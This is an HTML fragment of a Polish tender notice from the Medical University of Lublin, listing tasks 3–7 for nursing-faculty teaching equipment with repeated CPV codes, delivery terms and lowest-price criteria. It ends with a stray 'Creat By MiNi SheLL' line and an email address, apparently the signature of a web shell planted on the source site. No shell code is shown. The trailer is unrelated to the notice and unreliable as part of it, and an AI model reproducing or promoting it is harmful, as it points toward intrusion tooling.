<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych w siedmiu zadaniach (ofertach częściowych) następująco:
Zadanie 3 - Wyposażenie meblowe pracowni dydaktycznych (łóżka szpitale, szafki 
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących :
załącznik nr 7c dla Zadania 3
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych następująco:
Zadanie 4 - Fotel ginekologiczny i łóżko porodowe
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących :
załącznik nr 7d dla Zadania 4,  
do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych następująco:
Zadanie 5 - Sprzęt rehabilitacyjny (materace, piłki, drabinki)
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących : 
załącznik nr 7e dla Zadania 5,    
do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych  następująco:
Zadanie 6 - Dostawa urządzeń audiowizualnych
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących :
załącznik nr 7f  dla Zadania 6,
do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa medycznego wyposażenia niezbędnego do poprawy dostępu do bazy dydaktycznej oraz dostawa urządzeń audiowizualnych ujętych w projekcie pn.: Poprawa dostępu do bazy dydaktycznej na Wydziale Pielęgniarstwa i Nauk o Zdrowiu Uniwersytetu Medycznego w Lublinie określonych następująco:
Zadanie 7 - Drobny sprzęt medyczny
2.	Oferowany przez Wykonawców przedmiot zamówienia musi spełniać wymagane graniczne parametry techniczne i użytkowe zawarte w Zestawieniach wymaganych parametrów technicznych i funkcjonalnych stanowiących :
załącznik nr 7g dla Zadania 7   
do niniejszej SIWZ.
3.	Wspólny Słownik Zamówień (CPV): 
1)	33000000-0 Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała
2)	33100000-1 Urządzenia medyczne
3)	33140000-3 Materiały medyczne
4)	33190000-8 Różne urządzenia i produkty medyczne
5)	33192300-5 Meble medyczne, z wyjątkiem łóżek i stołów
6)	33192100-3 Łóżka do użytku medycznego
7)	33192120-9 Łóżka szpitalne
8)	33192000-2 Meble medyczne
9)	38412000-6 Termometry
10)	39143112-4 Materace
11)	39143116-2 Łóżeczka
12)	37420000-8 Sprzęt gimnastyczny	
13)	37423300-2 Gimnastyczne akcesoria do wspinania 
14)	37421000-5 Maty gimnastyczne
15)	38423100-7 Ciśnieniomierze
16)	38652100-1 Projektory
17)	38653400-1 Ekrany projekcyjne
18)	30195800-0 Chwyty do zwieszenia
19)	32324600-6 Telewizory
20)	33167000-8 lampy chirurgiczne
21)	31521000-4 Lampy
22)	38423000-6 Urządzenia  do pomiaru ciśnienia
23)	42923110-6 Wagi
Informacje dodatkowe
1.	Zamawiający wymaga zaoferowania przedmiotu zamówienia fabrycznie nowego, nieuszkodzonego, nieregenerowanego, nie będącego uprzednio przedmiotem ekspozycji i wystaw, kompletnego i gotowego do użycia (tj. bez żadnych zbędnych i dodatkowych inwestycji), nieobciążonego prawami osób lub podmiotów trzecich.
2.	Montaż obejmuje: dostarczenie do miejsca instalacji, rozpakowanie, zainstalowanie, sprawdzenie, przeprowadzenie wymaganych prób i pomiarów, uruchomienie, przeszkolenie pracowników odbiorcy i przekazanie urządzeń do użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com